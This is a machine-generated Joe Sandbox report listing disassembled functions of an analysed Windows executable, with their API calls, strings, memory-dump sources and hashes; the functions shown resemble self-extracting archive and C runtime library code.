                                                                                    • Instruction ID: 8448c85c0c5463f1a69fec7d3cf2af97004f309a226fbb0b75dc0217bae001e3
                                                                                    • Opcode Fuzzy Hash: d60f1059c2cc0b2ff023520d0019bd05b5a0f0ac0f5ab4a95a0593abc41cd69e
                                                                                    • Instruction Fuzzy Hash: 421151B1500705EFD3205F659889AA7FBECFF55395F10482EF6EA87100DB716885CB50
                                                                                    Function 0016BEE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: 065e5c232068dcdc6fd48510ea28dd2b75d0b51dddf28891cb868b84575c6aea
                                                                                    • Instruction ID: 6dd3e1554674ef970e5fe4ae2c8b3f05e91ac4fd79af37e7e12438cd37106797
                                                                                    • Opcode Fuzzy Hash: 065e5c232068dcdc6fd48510ea28dd2b75d0b51dddf28891cb868b84575c6aea
                                                                                    • Instruction Fuzzy Hash: 2E01717260D205BFC3119B28EC80E26BBA9E7493A4F050467F541D2930D3319DE1DFA1
                                                                                    Function 0015CE48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0015CE57
                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0015CE66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindHandleModuleResource
                                                                                    • String ID: LTR$RTL
                                                                                    • API String ID: 3537982541-719208805
                                                                                    • Opcode ID: 007a2929b6e3719a53ee28854b4e3f8410513c5b9cccc7fe24cc08be87ecfff5
                                                                                    • Instruction ID: b8968c721ae8f7dbd89850fed52786b780b10d9c0c09cf7da9eeff80f02e03f8
                                                                                    • Opcode Fuzzy Hash: 007a2929b6e3719a53ee28854b4e3f8410513c5b9cccc7fe24cc08be87ecfff5
                                                                                    • Instruction Fuzzy Hash: D2F02B31604358ABE7646A755C0BF673BACE789701F10425DF605960C0DBA19A4D8BF5
                                                                                    Function 00176552 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                    • Instruction ID: 0c111c22867a89cab720768c8376f8be99556781b1e363403f2b0b5d2195e649
                                                                                    • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                    • Instruction Fuzzy Hash: 63A16C71900B869FD725CF18C891BAEBBF5EF25354F24816DE44D9B242C3389D41C751
                                                                                    Function 00159F2A Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00157F55,?,?,?), ref: 00159FD0
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00157F55,?,?), ref: 0015A014
                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00157F55,?,?,?,?,?,?,?,?), ref: 0015A095
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,00157F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0015A09C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 2287278272-0
                                                                                    • Opcode ID: 314a1cc44c2ab6850d0f4dbef317959eb47ae4f2a5465dbf7440fedddcaac716
                                                                                    • Instruction ID: 2fd2864a88a29554728bc86717e3b4fefa6c74fe735644a84911f3ab234f941e
                                                                                    • Opcode Fuzzy Hash: 314a1cc44c2ab6850d0f4dbef317959eb47ae4f2a5465dbf7440fedddcaac716
                                                                                    • Instruction Fuzzy Hash: 2941CA31288384EAE731DE24DC45BAEBBE8AF85701F04091EB9E4DB1C1D7649A4C9B53
                                                                                    Function 001793F3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00172794,00000000,00000000,00172FC2,?,00172FC2,?,00000001,00172794,F5E85006,00000001,00172FC2,00172FC2), ref: 00179440
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001794C9
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001794DB
                                                                                    • __freea.LIBCMT ref: 001794E4
                                                                                      • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: d48a578350056b80c74a9397fdd82cd4ff9a0d8a27f86226484a70f347df5d2a
                                                                                    • Instruction ID: 56c883d21a0d5b72bb72fbf88d505a1057a268ee2f7f26150fd5c435d8e05d00
                                                                                    • Opcode Fuzzy Hash: d48a578350056b80c74a9397fdd82cd4ff9a0d8a27f86226484a70f347df5d2a
                                                                                    • Instruction Fuzzy Hash: 48319072A0020AABDB25DF64DC45DAE7BB5EF44710F158168FC09D7190E735CD9ACB90
                                                                                    Function 00169A76 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadBitmapW.USER32(00000065), ref: 00169A86
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00169AA7
                                                                                    • DeleteObject.GDI32(00000000), ref: 00169ACF
                                                                                    • DeleteObject.GDI32(00000000), ref: 00169AEE
                                                                                      • Part of subcall function 00168BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00169AC8,00000066), ref: 00168BE1
                                                                                      • Part of subcall function 00168BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00169AC8,00000066), ref: 00168BF9
                                                                                      • Part of subcall function 00168BD0: LoadResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C0C
                                                                                      • Part of subcall function 00168BD0: LockResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 142272564-0
                                                                                    • Opcode ID: 1d1a6e7304a6d24fda18367880aef2e95215eca47014087e70b7787100ce9d7f
                                                                                    • Instruction ID: 5c63d8c355c0c805b3db379fd5d8d56e264aff9d0fe1a2c81a985e89d8257543
                                                                                    • Opcode Fuzzy Hash: 1d1a6e7304a6d24fda18367880aef2e95215eca47014087e70b7787100ce9d7f
                                                                                    • Instruction Fuzzy Hash: BE01263364121437D6117BB89C42EBFB6AEEF95B61F480111FE00E7691DF618D2582F2
                                                                                    Function 00171009 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00171020
                                                                                      • Part of subcall function 00171658: ___AdjustPointer.LIBCMT ref: 001716A2
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00171037
                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00171049
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0017106D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 2633735394-0
                                                                                    • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                    • Instruction ID: 866d9e62a3d04c6897e1443b38310e902ba7ce501760ab2b166b83b520afe078
                                                                                    • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                    • Instruction Fuzzy Hash: E801E532400149FBCF225F59CC45EEA3BBAEF69754F158119FA1C66120C772E8B1EBA0
                                                                                    Function 00170B66 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00170B66
                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00170B6B
                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00170B70
                                                                                      • Part of subcall function 00171C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00171C1F
                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00170B85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                    • String ID:
                                                                                    • API String ID: 1761009282-0
                                                                                    • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                    • Instruction ID: 9d0eb2317ba0a8e7bcb2db8b7cb3a6239a81751a6b5d61f5085ff177e418b8ba
                                                                                    • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                    • Instruction Fuzzy Hash: 06C04C6C184340F81C273AF825021AD13700C7B7D9785E1C6EC9D170135F06474E5076
                                                                                    Function 00168CF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00168BA5: GetDC.USER32(00000000), ref: 00168BA9
                                                                                      • Part of subcall function 00168BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00168BB4
                                                                                      • Part of subcall function 00168BA5: ReleaseDC.USER32(00000000,00000000), ref: 00168BBF
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00168D24
                                                                                      • Part of subcall function 00168EEA: GetDC.USER32(00000000), ref: 00168EF3
                                                                                      • Part of subcall function 00168EEA: GetObjectW.GDI32(?,00000018,?), ref: 00168F22
                                                                                      • Part of subcall function 00168EEA: ReleaseDC.USER32(00000000,?), ref: 00168FB6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID: (
                                                                                    • API String ID: 1061551593-3887548279
                                                                                    • Opcode ID: e7d5b658fe04b43a89a65e0d2b0c8d42da67ad5fa7c0891b558a9fed1e90d878
                                                                                    • Instruction ID: d045de7acd6d61306b97f69b935f173e189e11f46a1f39cd8f7b6698fac25a20
                                                                                    • Opcode Fuzzy Hash: e7d5b658fe04b43a89a65e0d2b0c8d42da67ad5fa7c0891b558a9fed1e90d878
                                                                                    • Instruction Fuzzy Hash: D56114B1204201AFD314DFA4C888E6BBBE9FF89704F10491DF999C7260DB72E915CB62
                                                                                    Function 001601DF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 589789837-2259941744
                                                                                    • Opcode ID: fad7e7ee27fe1a33f80d6df6d9abb81f7597b1d116712b82b4e21807568b764b
                                                                                    • Instruction ID: 0bcad8e74d23bd83b3bd532b54e3e5109937165f98042af5e64fd986e6d8db1b
                                                                                    • Opcode Fuzzy Hash: fad7e7ee27fe1a33f80d6df6d9abb81f7597b1d116712b82b4e21807568b764b
                                                                                    • Instruction Fuzzy Hash: 3251B77128C300FBEA371A948C5AF337655AF1DF00F21C50EB796684E5CBE258746716
                                                                                    Function 00157619 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0015761E
                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00157799
                                                                                      • Part of subcall function 0015A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A0D7
                                                                                      • Part of subcall function 0015A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A108
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$H_prologTime
                                                                                    • String ID: :
                                                                                    • API String ID: 1861295151-336475711
                                                                                    • Opcode ID: dc9a8ff5502efd46a0413df2f95409081d3b840e10fd366e8e889bb9db479140
                                                                                    • Instruction ID: 7d8709b2e672051f1e9c5315a47c166b7d5db15fc7903304167dba201895570f
                                                                                    • Opcode Fuzzy Hash: dc9a8ff5502efd46a0413df2f95409081d3b840e10fd366e8e889bb9db479140
                                                                                    • Instruction Fuzzy Hash: F641E771804658EAEB24EB60EC46EEE737CEF54341F004099B965AB082DB705F8DCF61
                                                                                    Function 0015B275 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: UNC$\\?\
                                                                                    • API String ID: 0-253988292
                                                                                    • Opcode ID: de69de3c164524f04a2f34535d84d3858466b03b073f352d52e78860133c27e9
                                                                                    • Instruction ID: 094ca900e4a2938d1148135e0820d6ca8a5699a1c9185594ad5e0e9594cfd839
                                                                                    • Opcode Fuzzy Hash: de69de3c164524f04a2f34535d84d3858466b03b073f352d52e78860133c27e9
                                                                                    • Instruction Fuzzy Hash: 77419231408219EBCB61AF21CC81AEE7769FF14352F108126FCB4AA141F774DA9D8AA0
                                                                                    Function 0016802D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Shell.Explorer$about:blank
                                                                                    • API String ID: 0-874089819
                                                                                    • Opcode ID: ccadbe591de220f5d217b9672060d76275e4fc927bac27ad3d2d04a25c45c203
                                                                                    • Instruction ID: e1c4bef41dcb5bec3adb1c4f89e45d202500b7840b00c8304c7ea2b942f1d3b7
                                                                                    • Opcode Fuzzy Hash: ccadbe591de220f5d217b9672060d76275e4fc927bac27ad3d2d04a25c45c203
                                                                                    • Instruction Fuzzy Hash: 4B219F75300606AFD314AF74CC95E26B76CBF98710B148B19F5058B681CF71EC64CBA1
                                                                                    Function 0015DF34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0015DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0015DED4
                                                                                      • Part of subcall function 0015DEB5: GetProcAddress.KERNEL32(00191E58,CryptUnprotectMemory), ref: 0015DEE4
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0015DF2E), ref: 0015DFB5
                                                                                    Strings
                                                                                    • CryptUnprotectMemory failed, xrefs: 0015DFAD
                                                                                    • CryptProtectMemory failed, xrefs: 0015DF75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                    • API String ID: 2190909847-396321323
                                                                                    • Opcode ID: b78cc94851f40a9c3a6101da8aeb7e93b24a7863111b1c05dd86a68338f2dfed
                                                                                    • Instruction ID: 82f0ea27d0a301ca0a44baaf789234a1cd3a83559f8f19a2022e5962a9cc89d8
                                                                                    • Opcode Fuzzy Hash: b78cc94851f40a9c3a6101da8aeb7e93b24a7863111b1c05dd86a68338f2dfed
                                                                                    • Instruction Fuzzy Hash: 44113171708116EBEB26A729EC01E6A7359AFD4751B05401BFC23DF191DB70DD4A87D0
                                                                                    Function 001512E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0015CED7: GetWindowRect.USER32(?,?), ref: 0015CF0E
                                                                                      • Part of subcall function 0015CED7: GetClientRect.USER32(?,?), ref: 0015CF1A
                                                                                      • Part of subcall function 0015CED7: GetWindowLongW.USER32(?,000000F0), ref: 0015CFBB
                                                                                      • Part of subcall function 0015CED7: GetWindowRect.USER32(?,?), ref: 0015CFE8
                                                                                      • Part of subcall function 0015CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0015D007
                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                    • SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
